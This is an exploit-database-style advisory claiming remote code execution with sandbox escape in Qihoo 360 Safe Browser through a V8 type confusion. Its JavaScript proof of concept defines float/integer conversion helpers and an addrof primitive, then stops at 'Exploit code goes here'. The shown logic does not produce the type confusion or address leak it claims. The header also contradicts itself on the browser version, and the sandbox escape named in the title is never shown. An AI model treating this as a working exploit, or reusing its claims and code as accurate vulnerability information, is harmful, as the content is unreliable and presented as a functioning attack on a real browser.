# Exploit Title: Qihoo 360 Safe Browser v12.3.1611.0 - RCE with Sandbox Escape
# Google Dork: N/A
# Date: 2021-05-11
# Exploit Author: youtube.com/@memorycorruptor
# Vendor Homepage: https://browser.360.cn/se/
# Version: Qihoo 360 Safe Browser v13.0.2170.0
# Tested on: Windows x64 / Linux Debian x64 / MacOS
# CVE: CVE-2021-33972
# PoC Video: https://www.youtube.com/@memorycorruptor/videos
# Description: https://memorycorruptor.blogspot.com/p/vulnerabilities-disclosures.html
---------------------------------------------------------------------------
Qihoo 360 Safe Browser v12.3.1611.0 is a web browser built on the Chrome engine and uses the V8 JavaScript engine. A recently discovered RCE vulnerability in this version allows an attacker to execute arbitrary code on a victim's computer remotely.

The vulnerability lies in the V8 JavaScript engine, a critical component of Qihoo 360 Safe Browser v12.3.1611.0. It was discovered in 2021 and is the result of a type confusion issue: the V8 engine improperly handles certain JavaScript objects, which leads to memory corruption and can allow an attacker to execute arbitrary code.
```javascript
function trigger() {
    // Plain object whose property slot is later overwritten with the target object.
    let o = {a: 1};
    // Proxy with an empty handler: every operation is forwarded to the target o.
    let p = new Proxy(o, {});
    p.__proto__ = {};
    p.__proto__.x = 0;

    // One 8-byte buffer viewed both as a double and as two 32-bit words,
    // so a value can be reinterpreted between float and 64-bit integer.
    let b = new ArrayBuffer(8);
    let f64 = new Float64Array(b);
    let u32 = new Uint32Array(b);

    // Float -> 64-bit BigInt (the raw bit pattern, not the numeric value).
    function ftoi(val) {
        f64[0] = val;
        return BigInt(u32[0]) + (BigInt(u32[1]) << 32n);
    }

    // 64-bit BigInt -> float with the same bit pattern.
    function itof(val) {
        u32[0] = Number(val & 0xffffffffn);
        u32[1] = Number(val >> 32n);
        return f64[0];
    }

    // Stores obj in o.a, then reads x back through the proxy and reinterprets it.
    function addrof(obj) {
        o.a = obj;
        return ftoi(p.x);
    }

    // Exploit code goes here
}

trigger();
```
This PoC code first sets up a type confusion situation in the V8 engine by creating a proxy object and modifying its __proto__ property. The addrof function then leaks the address of an object by triggering the type confusion. The ftoi and itof functions convert between the floating-point and integer representations of the same 64-bit pattern, which is essential for exploiting this vulnerability.

The RCE vulnerability can allow an attacker to execute arbitrary code on the victim's computer, potentially leading to data theft, unauthorized access, or other malicious actions. Users should update to the latest version of Qihoo 360 Chrome or switch to an alternative browser to mitigate this vulnerability. Browser developers should apply the V8 engine patches and ensure that JavaScript objects are handled correctly to prevent such issues in the future.
---------------------------------------------------------------------------